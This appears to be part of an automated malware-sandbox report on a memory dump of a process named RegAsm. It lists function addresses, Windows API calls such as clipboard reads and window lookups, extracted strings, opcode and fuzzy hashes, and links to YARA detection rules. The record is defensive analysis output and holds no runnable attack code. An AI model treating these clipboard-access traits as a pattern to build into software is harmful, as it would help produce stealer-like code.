Similarity

API ID:
String ID: !Y)[$(],_$5M0O$7E9G$9Q>S$a%a'$}z{x$}z{x
API String ID: 0-3640916644
Opcode ID: b97c1ed88e3d31725ddd3fb39334953d3a5a36b18cccd788339356fcf47fbaec
Instruction ID: 8038b8fc89dd961067976e9b5db2b0514576f957f4e335a3c0ff1a04589f3cd3
Opcode Fuzzy Hash: b97c1ed88e3d31725ddd3fb39334953d3a5a36b18cccd788339356fcf47fbaec
Instruction Fuzzy Hash: 75F1E0B9608350DFE3148F25E88176BBBE2FBC6308F55992DE5C48B351D7789806CB46

Function 00430850 Relevance: 9.1, APIs: 6, Instructions: 148clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00430874
GetWindowLongW.USER32 ref: 004308A1
GetClipboardData.USER32 ref: 004308B1
GlobalLock.KERNEL32 ref: 004308CE

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Clipboard$DataGlobalLockLongOpenWindow
String ID:
API String ID: 2401467216-0
Opcode ID: 80ae8dc8c6d18b1cee28cd6ec83ed87ed6a750223610910af8073deb50422026
Instruction ID: 9f61a7f57793e4596e5270650fb0acd557b46b5302941234fdd1030700afe210
Opcode Fuzzy Hash: 80ae8dc8c6d18b1cee28cd6ec83ed87ed6a750223610910af8073deb50422026
Instruction Fuzzy Hash: 9051F3B18087918FE710AF7C9849359BFA0AF0A320F04873EE4A5972C6D3389915C7DB

Function 00401319 Relevance: 9.1, Strings: 7, Instructions: 359COMMON

Download Yara Rule

Strings

gfff, xrefs: 00401FF1
-, xrefs: 00401F52
gfff, xrefs: 00401F87
0123456789abcdefxp, xrefs: 00401323
gfff, xrefs: 00401F9C
., xrefs: 004015DC
0123456789ABCDEFXP, xrefs: 00401319

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: -$.$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
API String ID: 0-1174649707
Opcode ID: 972c0c19f3367577f30cdd07c54cebfd700f8fb924cb3ba66696f422193f3866
Instruction ID: 403c9a24cc0b424e44ca226eb23ace12f505a5e85219b6d181a1ec56798b9143
Opcode Fuzzy Hash: 972c0c19f3367577f30cdd07c54cebfd700f8fb924cb3ba66696f422193f3866
Instruction Fuzzy Hash: ACD1D17160C3818FC715CE29C58026BFBE2AFD9304F08CA7EE8D997392D679D9058B52

Function 0040F560 Relevance: 7.9, Strings: 6, Instructions: 407COMMON

Download Yara Rule

Strings

k%h#, xrefs: 0040F742
c)t', xrefs: 0040F738
9i7g, xrefs: 0040F7D8
-e0c, xrefs: 0040F7E2
a-e+, xrefs: 0040F72E
}#{, xrefs: 0040F7A6

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: -e0c$9i7g$a-e+$c)t'$k%h#$}#{
API String ID: 0-851799077
Opcode ID: 80ddb2f44f2575dc62d3539306a1e6ad7e80bd5b2b4f9377e5cd2c2ff4a90e29
Instruction ID: 226b39ae0588f89a9092dc77e17c664bc41f618938104ad4f5360f269260c37c
Opcode Fuzzy Hash: 80ddb2f44f2575dc62d3539306a1e6ad7e80bd5b2b4f9377e5cd2c2ff4a90e29
Instruction Fuzzy Hash: 79F165B6600B01DFE3208F26D891797BBF5FF85314F148A2DD5EA8BA90DB74A4058F84

Function 00418602 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90threadCOMMON

Download Yara Rule

APIs

FindWindowExW.USER32(00000000,?,?,00000000), ref: 00418692
GetWindowThreadProcessId.USER32(?,00000000), ref: 0041876D
GetWindowThreadProcessId.USER32(?,00000000), ref: 00418776

Strings

<=, xrefs: 0041865A

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Window$ProcessThread$Find
String ID: <=
API String ID: 1729321468-1782720273
Opcode ID: d3492a7d5e526fc87329d80c09a87ff4cf5b8b09f9a5eede5d923626e6db5ca8
Instruction ID: 1de689ebf0d195e78d33ca8b3caddefcbfdc312f4367fcf791db92f2621f5657
Opcode Fuzzy Hash: d3492a7d5e526fc87329d80c09a87ff4cf5b8b09f9a5eede5d923626e6db5ca8
Instruction Fuzzy Hash: E0416A78608781CFD7208F28E89478BB7F1FB8A306F14487CE18897292C730A905CF4A

Function 0040DE80 Relevance: 6.7, Strings: 5, Instructions: 466COMMON

Download Yara Rule

Strings

, xrefs: 0040E185
$, xrefs: 0040E0BE
PQ, xrefs: 0040E28E
23E0BFEB01D60A4A099CC005E5A2036C, xrefs: 0040DFE5
DX^3, xrefs: 0040E092, 0040E099, 0040E171, 0040E1D7

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $$$23E0BFEB01D60A4A099CC005E5A2036C$DX^3$PQ
API String ID: 0-1832584676
Opcode ID: 3e458582c41a46088a5448278069d74cbd1c4d45b9acaddecf50ac3881ae721c
Instruction ID: 9a7bbf91fe650ef5fdbc314e9f1c13212ee9d96e8c444d51ecb61092464050ec
Opcode Fuzzy Hash: 3e458582c41a46088a5448278069d74cbd1c4d45b9acaddecf50ac3881ae721c
Instruction Fuzzy Hash: E0E1F1716187808BD3248F35C89176BBBE1AFD6318F188A2DE5E1873A2D738D409CB46

Function 0040DA20 Relevance: 6.7, Strings: 5, Instructions: 425COMMON

Download Yara Rule

Strings

<, xrefs: 0040DD6D
.%, xrefs: 0040DA84
zc, xrefs: 0040DBA1
5731, xrefs: 0040DD95
N, xrefs: 0040DBE0

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: .%$5731$<$N$zc
API String ID: 0-3590630948
Opcode ID: a339d7b774e9fb67e5e5ceacdd65e5825fb1bb6493b799b352ca91620ab2bc0e
Instruction ID: d361d60cf2ed4bacefb7b3db2f78a2fd6364d4ce0cb720ae1548083b2f500561
Opcode Fuzzy Hash: a339d7b774e9fb67e5e5ceacdd65e5825fb1bb6493b799b352ca91620ab2bc0e
Instruction Fuzzy Hash: C3B1E47050C3908FD325CF2984A076BBFE1AF97344F1848ADE5D55B392D77A880ACB96

Function 0041C513 Relevance: 6.5, Strings: 5, Instructions: 237COMMON

Download Yara Rule

Strings

O1nO, xrefs: 0041C57A
9A-_, xrefs: 0041C59A
7Y+W, xrefs: 0041C5AA
.]z[, xrefs: 0041C5A2
\9Y7, xrefs: 0041C5F1

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: .]z[$7Y+W$9A-_$O1nO$\9Y7
API String ID: 0-3103464985
Opcode ID: 1d7e6db69ed658b59888eda7bcc29677fade6b36f2f0ccfe7b9835da22dba30b
Instruction ID: 0b6c74c9a379bff11fef6752102846e2e17ce21d8912ff1bac0dfa61de8bd882
Opcode Fuzzy Hash: 1d7e6db69ed658b59888eda7bcc29677fade6b36f2f0ccfe7b9835da22dba30b
Instruction Fuzzy Hash: 9E61F472908361CBC714CF25DC812ABBBB1EF91748F18856DE4C45B351E339D946CB96

Function 0041C52A Relevance: 6.5, Strings: 5, Instructions: 233COMMON

Download Yara Rule

Strings

O1nO, xrefs: 0041C57A
9A-_, xrefs: 0041C59A
7Y+W, xrefs: 0041C5AA
.]z[, xrefs: 0041C5A2
\9Y7, xrefs: 0041C5F1

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: .]z[$7Y+W$9A-_$O1nO$\9Y7
API String ID: 0-3103464985
Opcode ID: 4cf5652ecf1bc13ba8969e941ffec233667405590163c8fd6cf79d4d2287ef0f
Instruction ID: 33433c1cf5a6180f53deb35bc3d05ad82548ba427fd27d41d3c12cab20251898
Opcode Fuzzy Hash: 4cf5652ecf1bc13ba8969e941ffec233667405590163c8fd6cf79d4d2287ef0f
Instruction Fuzzy Hash: 1C610572908361CBC7148F25DC812ABBBB2EFD1744F18896DE8C45B351E339D946CB96

Function 0043D840 Relevance: 5.7, Strings: 4, Instructions: 736COMMON

Download Yara Rule

Strings

}z{x, xrefs: 0043DDA0
InA>, xrefs: 0043DE20
|7(, xrefs: 0043DF64
<, xrefs: 0043D97C

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: <$InA>$}z{x$|7(
API String ID: 0-3008498783
Opcode ID: f2cecdcd3e361a2e014ab8c53f77bf8355bcc2adbde0a80359934737828f8ad6
Instruction ID: ba6db43fa6947fad4a234946ca23f5e0f67a27b0eedd178c8c14836eec61e73d
Opcode Fuzzy Hash: f2cecdcd3e361a2e014ab8c53f77bf8355bcc2adbde0a80359934737828f8ad6
Instruction Fuzzy Hash: A432D331A083604FD315CF29D89036FBBE1EBD5314F19C92DD8A99B391DB7998068BC6

Function 00439140 Relevance: 5.6, Strings: 4, Instructions: 618COMMON

Download Yara Rule

Strings

f, xrefs: 00439369
InA>, xrefs: 004391E0
}z{x, xrefs: 004391C6
InA>, xrefs: 004394B0

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: InA>$InA>$f$}z{x
API String ID: 2994545307-844105762
Opcode ID: 9d5e47f722ad35d1dcce10b245d1461c301b91904b756726b6f9b6ae6c2c1f40
Instruction ID: 4c4d201456567d4c56ccc0aeffc3ce956cb08362b783be90ad7721609f75a985
Opcode Fuzzy Hash: 9d5e47f722ad35d1dcce10b245d1461c301b91904b756726b6f9b6ae6c2c1f40
Instruction Fuzzy Hash: 7B32D0756083419FD714CF29C890B2FBBE2ABC9314F189A2EE4968B391D778DC05CB56

Function 00417502 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 332COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000001), ref: 00417640
ExitProcess.KERNEL32(00000001), ref: 004177B9

Strings

|}, xrefs: 0041781F

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExitProcess
String ID: |}
API String ID: 621844428-3974572420
Opcode ID: e2968ba23e1fb9159bc81495b3c9d2b65627d20b62a74ea636a2c7995b96266b
Instruction ID: 8b9c484b879947a4d1af565195316180e6d0e27292e811ae7adbada8751f1822
Opcode Fuzzy Hash: e2968ba23e1fb9159bc81495b3c9d2b65627d20b62a74ea636a2c7995b96266b
Instruction Fuzzy Hash: 62B11471608340DBC7249F28C8926ABB7F2FF91314F19492EF4958B3A1E738E945C796

Function 00430A30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00430A72
GetSystemMetrics.USER32 ref: 00430A82

Strings

, xrefs: 00430B6F

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 848ca4ac9c7c9123e47ac06bf2781841a63368e1a9ee2891494c07c3ac6088da
Instruction ID: fbbce7ad633b07f750d1d39319c3832ca9b6930809a03d8f12be590156538362
Opcode Fuzzy Hash: 848ca4ac9c7c9123e47ac06bf2781841a63368e1a9ee2891494c07c3ac6088da
Instruction Fuzzy Hash: 77A14CB040D3818BE370DF54C58879BBAE0BB85308F508D2EE5994B350DBB9594ACF97

Function 00408960 Relevance: 4.1, Strings: 3, Instructions: 391COMMON

Download Yara Rule

Strings

), xrefs: 004089DC
), xrefs: 004089E6
IEND, xrefs: 00408DC0

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: c5c8fa8975e90c00b6fff2f16777a39e1fc21c1793c43ec1ac37d209ff79c10b
Instruction ID: 3fe9b987952ccde178efa9f1f1c00db419640494b095269c1b53dd01ec44560a
Opcode Fuzzy Hash: c5c8fa8975e90c00b6fff2f16777a39e1fc21c1793c43ec1ac37d209ff79c10b
Instruction Fuzzy Hash: E9E1B071A087019FE310DF28C88571ABBE0BB94314F14463EE999A73D1DB79E915CBCA

Function 0040F0B0 Relevance: 4.1, Strings: 3, Instructions: 367COMMON

Download Yara Rule

Strings

0, xrefs: 0040F0CE
2, xrefs: 0040F4A5
(), xrefs: 0040F266

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ()$0$2
API String ID: 0-2766669394
Opcode ID: b431683c6e682e94ca6e93cbb4d2751a54d99ebcda0fd91457817300398900ae
Instruction ID: 866e2b648f7bcc383e22ba6bbda90a5c047cd05d48a8e8d2e44f1a1a3b7545c2
Opcode Fuzzy Hash: b431683c6e682e94ca6e93cbb4d2751a54d99ebcda0fd91457817300398900ae
Instruction Fuzzy Hash: 1CC1D47050C3805BD324CF29D45036BBBE2ABD2358F18897DE4D59B792D779884ACB86

Function 004353B0 Relevance: 3.9, Strings: 3, Instructions: 178COMMON

Download Yara Rule

Strings

,, xrefs: 004353C8
L, xrefs: 00435400
V, xrefs: 004354E5

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,$L$V
API String ID: 0-3877858482
Opcode ID: c35838ac3b52fd7dcdf85d22ca4ee41a6469e687630e0e6e861e5fb83dbaeeb0
Instruction ID: 4edee43f13eaa5c9364344f410c50a112933f2e40cc67b21435f632fef56cc8f
Opcode Fuzzy Hash: c35838ac3b52fd7dcdf85d22ca4ee41a6469e687630e0e6e861e5fb83dbaeeb0
Instruction Fuzzy Hash: 7651387260DB408FD304CA28C88075BBBD2DBD9324F68992EE992C73C5D27DD8469757

Function 0043BBB1 Relevance: 3.9, Strings: 3, Instructions: 118COMMON

Download Yara Rule

Strings

yt/, xrefs: 0043BBEA
yt/, xrefs: 0043BCB7
Zly, xrefs: 0043BC6A

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: Zly$yt/$yt/
API String ID: 0-753245582
Opcode ID: 6d50fe596ce45943e37491d3dc783259b6d4f02450cd38f04fe773c11fcd919d
Instruction ID: 43c425d19c7a5dd9d2b0e9e6ee396766c4f387a1a8bde8379edbf945f8c64b42
Opcode Fuzzy Hash: 6d50fe596ce45943e37491d3dc783259b6d4f02450cd38f04fe773c11fcd919d
Instruction Fuzzy Hash: 9C41DD75A5929A8BCB18CF25C8D1677B7B1FF45301B08A49DC841AF39ADB38D90287D8

Function 0042E040 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 191memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0042E0D4

Strings

0, xrefs: 0042E2DF

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 59a59e496c15b31520d46163908f026c1e4ba21edbc2369837729b528570f3b6
Instruction ID: 401af09a7ed2aae6443b5b0347409f39c7debde8c166e065ad41f31685bf1d94
Opcode Fuzzy Hash: 59a59e496c15b31520d46163908f026c1e4ba21edbc2369837729b528570f3b6
Instruction Fuzzy Hash: 57A14861508BC38ED326CB3D8848351FF912B67228F4887DDD1E94F3E3C6669586C7A6

Function 00414C80 Relevance: 3.5, Strings: 1, Instructions: 2208COMMON

Download Yara Rule

Strings

`, xrefs: 004158E4

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 52c9b55d4f170e924085039732d23a8a0f36de7406f81f9c79a709b9b2304bb3
Instruction ID: 60fffcb7ddb212a5d676b36c4c9f741d8bce4370e68628e52d9c27c4b6fe9df3
Opcode Fuzzy Hash: 52c9b55d4f170e924085039732d23a8a0f36de7406f81f9c79a709b9b2304bb3
Instruction Fuzzy Hash: 34130471508B808FD321DF38C445396BFE1AB96314F198A6ED4EA8B3C2D739D486CB56

Function 0043E5E0 Relevance: 3.1, Strings: 2, Instructions: 649COMMON

Download Yara Rule

Strings

RC, xrefs: 0043EAD6
2C, xrefs: 0043EE21

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 2C$RC
API String ID: 0-1391150340
Opcode ID: fc5ff4035ef74794b7028ebda16b818d7be87af367fc3d0af348e6a1eedd5825
Instruction ID: 902639593efb1adc729ef976fb9a09d130562e765ab59f5f1a123f29baa4bf43
Opcode Fuzzy Hash: fc5ff4035ef74794b7028ebda16b818d7be87af367fc3d0af348e6a1eedd5825
Instruction Fuzzy Hash: 9922FF35B49251CFCB08CF68E8D06ABB7E2EF8A314F19997DD48587392D634AD41CB84

Function 00424ED7 Relevance: 3.0, Strings: 2, Instructions: 538COMMON

Download Yara Rule

Strings

2PB, xrefs: 00425021
ps, xrefs: 00425666

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 2PB$ps
API String ID: 0-671739700
Opcode ID: c6ea4c7b4d18812ceb3bcea0779d0ca6c6b0142fa2d4edefc190e3cb97736df6
Instruction ID: 5e7dc2819c80145dc054ae22620034d70ca708cdd621eebf7f74af3be58f577e
Opcode Fuzzy Hash: c6ea4c7b4d18812ceb3bcea0779d0ca6c6b0142fa2d4edefc190e3cb97736df6
Instruction Fuzzy Hash: 53F155B6A08351CFD300CF24E88122BB7E1EF9A304F49896EE4C597341D739D906CB9A

Function 0041102F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0041102F

Strings

-4, xrefs: 00411FAE

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Uninitialize
String ID: -4
API String ID: 3861434553-3249790742
Opcode ID: c1f68f55d8e8b98da7a8dc8f71a31de373854987414512868f1acd656190aac3
Instruction ID: ee78c7d0252da59181078afd55f973ef8b1dab3207e3fec2bebd3f090d2a1d50
Opcode Fuzzy Hash: c1f68f55d8e8b98da7a8dc8f71a31de373854987414512868f1acd656190aac3
Instruction Fuzzy Hash: 44C01238A180008B86088F20AC80139B27AAB8F20AB50A42AC01B6B222C274D442860C

Function 0041D570 Relevance: 3.0, Strings: 2, Instructions: 468COMMON

Download Yara Rule

Strings

,, xrefs: 0041D5B6
31p, xrefs: 0041D93B

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,$31p
API String ID: 0-3672193133
Opcode ID: 3b0b92d6cdc792e5a557f5ee7d0f6ea3c878578644043c5c287c0542c9f0ebe8
Instruction ID: 0db7e3a9d10fbc96566f6a30befd23890478b61157418dd703e2a2833b2feb34
Opcode Fuzzy Hash: 3b0b92d6cdc792e5a557f5ee7d0f6ea3c878578644043c5c287c0542c9f0ebe8
Instruction Fuzzy Hash: B2E1F2B1A08350ABD3009F25DC427AFBBE5EFC5314F14892EF8D497382D63999098B97

Function 004366F7 Relevance: 3.0, Strings: 2, Instructions: 455COMMON

Download Yara Rule

Strings

n'B!, xrefs: 00436AD5
#, xrefs: 00436A68

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #$n'B!
API String ID: 0-2406872370
Opcode ID: 7520753a4ec4cd0a9bc0959d14932fcb5a92b39f3286b2a0234cb41b6301714d
Instruction ID: 5532e4a095cd03926b6754af58d78df9e487e896dc0285bec9cc4d8b2487c21a
Opcode Fuzzy Hash: 7520753a4ec4cd0a9bc0959d14932fcb5a92b39f3286b2a0234cb41b6301714d
Instruction Fuzzy Hash: 87D1E33B619212CBCB18AF28DC6226E73E2FF8A745F0BC47DD4458B2A0DB39C9508715

Function 00427850 Relevance: 2.9, Strings: 2, Instructions: 413COMMON

Download Yara Rule

Strings

}z{x, xrefs: 00427B56
ryB, xrefs: 00427960

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ryB$}z{x
API String ID: 0-3595579947
Opcode ID: e3fd13b0211b140d4cee699fec39235313ffbdec5da536664cfb4763deb2b543
Instruction ID: e64e3fa33d78de06d07d4f31c5caed61163ad81ea0520844689b92f237595dcd
Opcode Fuzzy Hash: e3fd13b0211b140d4cee699fec39235313ffbdec5da536664cfb4763deb2b543
Instruction Fuzzy Hash: 12D15874B08254CFDB048F79E891BAE7BB2BF0A310F484169E4516B3A2D3398955CB58

Function 004039B0 Relevance: 2.9, Strings: 2, Instructions: 404COMMON

Download Yara Rule

Strings

NaN, xrefs: 00403A0A
Inf, xrefs: 00403A03

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: Inf$NaN
API String ID: 0-3500518849
Opcode ID: b2d6dbe4a8ed3ba7c3c3ece30ad588f21e603247d60f78f7ed55546bfa18716e
Instruction ID: 9d20fe0f1689027ec302827207c54d9aa33afb8cf0750e27db07b6bb90104c65
Opcode Fuzzy Hash: b2d6dbe4a8ed3ba7c3c3ece30ad588f21e603247d60f78f7ed55546bfa18716e
Instruction Fuzzy Hash: 73D1D272A083019BC704CF28C88161BBBE9EFC4751F258A3EF895A73D1E674DD458B86

Function 0043E9A0 Relevance: 2.9, Strings: 2, Instructions: 371COMMON

Download Yara Rule

Strings

RC, xrefs: 0043EAD6
2C, xrefs: 0043EE21

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 2C$RC
API String ID: 0-1391150340
Opcode ID: 47bdd1629d8f716d50c4e0db6c3af90283284a9c7215131e04e19a965d554ea4
Instruction ID: ed11ff15a1a981262f8686fb5d61f059c79d3f6f0ef384eb20de4fd9b16eabb5
Opcode Fuzzy Hash: 47bdd1629d8f716d50c4e0db6c3af90283284a9c7215131e04e19a965d554ea4
Instruction Fuzzy Hash: 47C12F36A493518FD308DF28E8D436BB7E2EBCA314F09987DD48987391E6789D44CB85

Function 0043CF00 Relevance: 2.9, Strings: 2, Instructions: 367COMMON

Download Yara Rule

Strings

}z{x, xrefs: 0043CF30
}z{x, xrefs: 0043D0F0

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: }z{x$}z{x
API String ID: 2994545307-3037524793
Opcode ID: e1e1837aef38f0d13f843ac7e9c5122192c367d3f630a312e7015485329a7eae
Instruction ID: 26a0a89f1a44b15d47a16fbcff24c487426fc784e6dadf911e537e09bff36337
Opcode Fuzzy Hash: e1e1837aef38f0d13f843ac7e9c5122192c367d3f630a312e7015485329a7eae
Instruction Fuzzy Hash: 79B13971A083105BD724CB68DC81BABB7E2EB8D314F14953EE9A5D7391EA38DC018796

Function 004014B3 Relevance: 2.8, Strings: 2, Instructions: 263COMMON

Download Yara Rule

Strings

0123456789abcdefxp, xrefs: 004014BD
0123456789ABCDEFXP, xrefs: 004014B3

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0123456789ABCDEFXP$0123456789abcdefxp
API String ID: 0-595753566
Opcode ID: 42d60f80324c95ef2fd19c79e7edbe83cd68dcc0952184340a40a4c4267bc099
Instruction ID: 7f83093fdfa886b29f6d75bb5a23efdcf0648f8279e69ff4650518dc13d16477
Opcode Fuzzy Hash: 42d60f80324c95ef2fd19c79e7edbe83cd68dcc0952184340a40a4c4267bc099
Instruction Fuzzy Hash: 7C91D031A083418FD714CE29858426FBBE2AFD5314F18893EE999A73D1D7B9D8058B86

Function 00439D20 Relevance: 2.7, Strings: 2, Instructions: 244COMMON

Download Yara Rule

Strings

}z{x, xrefs: 00439D96
InA>, xrefs: 00439DB0

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: InA>$}z{x
API String ID: 2994545307-3945942619
Opcode ID: f684a0a990c9be733cc2f7c1ac2074812c3242ecbc91358c227a7a4678b5d252
Instruction ID: 6a07bf609f58bb5fe5e5209b5a76e29dba01eb35f8b35c3385471842874dc2cd
Opcode Fuzzy Hash: f684a0a990c9be733cc2f7c1ac2074812c3242ecbc91358c227a7a4678b5d252
Instruction Fuzzy Hash: 5E7126356083015FD724CE29C89173BB7E2EBC9710F28A53EE99597395D7B8DC018789

Function 004301C0 Relevance: 2.7, Strings: 2, Instructions: 207COMMON

Download Yara Rule

Strings

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00430382
d, xrefs: 00430235

Memory Dump Source

Source File: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$d
API String ID: 0-1366390183
Opcode ID: e1b91ec2ef23bc578b4f06f2501a641cb40cdc63300cc35eb551276cff98db83
Instruction ID: 01e5e9634b5cffb52571688a3fed49eba931a860efd4cd8f88a0e5880b0f4981
Opcode Fuzzy Hash: e1b91ec2ef23bc578b4f06f2501a641cb40cdc63300cc35eb551276cff98db83
